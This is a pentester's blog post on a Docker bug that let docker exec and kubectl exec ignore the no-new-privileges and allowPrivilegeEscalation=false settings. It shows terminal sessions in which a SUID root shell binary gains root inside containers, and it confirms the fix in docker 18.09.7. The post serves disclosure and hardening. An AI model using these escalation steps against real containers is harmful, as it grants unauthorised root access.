docker/kubectl exec did not respect no-new-privileges and allowPrivilegeEscalation

TL;DR: There was a bug in docker, which made docker exec not respect the no-new-privileges security option. This issue also impacted the allowPrivilegeEscalation=false setting in Kubernetes. This could have been abused by attackers in certain scenarios. The bug has recently been resolved (confirmed in docker version 18.09.7). So make sure to update docker!

I recently performed a Kubernets pentest and encountered some strange behavior that only made sense after some investigation. Unfortunately this is not well documented in the Kubernetes documentation at the time of this writing.

A client wanted to secure his pods and prevent them from running with root. So they set the securityContext and specified a non-privileged user via the runAsUser/runAsGroup configuration. However, this setting is not bulletproof, since a compromised process might escalate its privileges at runtime, e.g. with SUID root binaries. I created a PoC for it and it worked as expected – I got root despite a non-privileged user being specified in the securityContext. But this is not really the scope of this post.

But next I wanted to give the client recommendations about how to resolve this issue and if you know the Kubernetes securityContext settings, you are probably aware of the allowPrivilegeEscalation flag. This flag is supposed to prevent exactly what I did in my PoC. From the Kubernetes documentation:

AllowPrivilegeEscalation: Controls whether a process can gain more privileges than its parent process.

So what I did was to set this setting to false, kubectl-exec into by container, try to escalate again and check my uid. I would have expected that privilege escalation would not work now and that I am still a non-privileged user. But here is what I got after executing my SUID root shell:

user@kubernetes-master:~$ kubectl run urootshell --image=impidio/urootshell:0.2 --replicas=1 --overrides='{"spec": {"template": {"spec": {"containers": [{"name": "urootshell", "image": "impidio/urootshell:0.2", "command": ["/bin/sh", "-c", "sleep 60m"], "securityContext": {"allowPrivilegeEscalation": false} }]}}}}'
deployment.apps/urootshell created
user@kubernetes-master:~$ kubectl get pod urootshell-56c65c6666-kgjdr -o yaml | grep allowPriv
      allowPrivilegeEscalation: false
user@kubernetes-master:~$ kubectl exec -it urootshell-56c65c6666-kgjdr -c urootshell -- bash
user@urootshell-56c65c6666-kgjdr:~$ id
uid=1000(user) gid=1000(user) groups=1000(user)
user@urootshell-56c65c6666-kgjdr:~$ ls -l /bin/rootshell
-rwsrwxrwx 1 root root 8352 Sep  5 14:42 /bin/rootshell
user@urootshell-56c65c6666-kgjdr:~$ /bin/rootshell
# id
uid=0(root) gid=1000(user) groups=1000(user)

Still root. Strange. Does the allowPrivilegeEscalation setting not work?

So I confirmed that the allowPrivilegeEscalation=false gets passed on to the docker-runtime for the container in my Kubernetes pod:

user@kubernetes-node1:~$ docker inspect 32ee4c9105a4
...
"SecurityOpt": [
                "no-new-privileges",
                "seccomp=unconfined"
            ],
...

So everything looks correctly applied. So why does it not prevent me from escalating? So next, I looked at the processes in the pod directly:

user@kubernetes-master:~$ kubectl exec -it urootshell-56c65c6666-kgjdr -c urootshell -- bash
user@urootshell-56c65c6666-kgjdr:~$ grep NoNewPrivs /proc/1/status
NoNewPrivs:     1
user@urootshell-56c65c6666-kgjdr:~$ grep NoNewPrivs /proc/$$/status
NoNewPrivs:     0
user@urootshell-56c65c6666-kgjdr:~$ /bin/rootshell
# id
uid=0(root) gid=1000(user) groups=1000(user)
# grep NoNewPrivs /proc/$$/status
NoNewPrivs:     0

Interesting, so the actual container process had NoNewPrivs correctly applied at kernel-level, but my kubectl-exec bash not and so the same for my SUID root shell (rootshell). To me this looked like a bug or even vulnerability. But is it in Kubernetes or Docker?

So I tried if this also happens in Docker. First I ran a docker container interactively and tried to escalate with the no-new-privileges flag set:

user@kubernetes-node1:~$ docker run -it --security-opt no-new-privileges impidio/urootshell:0.4
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ /bin/rootshell
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

Seems to work correctly. However, when I used docker exec to go into the same container, it was again possible to escalate:

user@kubernetes-node1:~$ docker exec -it fd9dce6682b8 /bin/sh
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ /bin/rootshell
# id
uid=0(root) gid=1000(user) groups=1000(user)

In fact not a Kubernetes, but a docker exec issue!

After some further research, I came across this bug-report and clicked through a few references until I ended up here [2]. So this described exactly my problem and seems to have been resolved quite recently.

So I upgraded to the latest docker version available in Ubuntu, which was 18.09.7 at the time of this writing to confirm it this issue has been resolved and it is!

root@ubuntu:/home/user# docker exec -it 0d sh
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ /bin/rootshell
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

So hopefully something we won’t need to worry about anymore in future!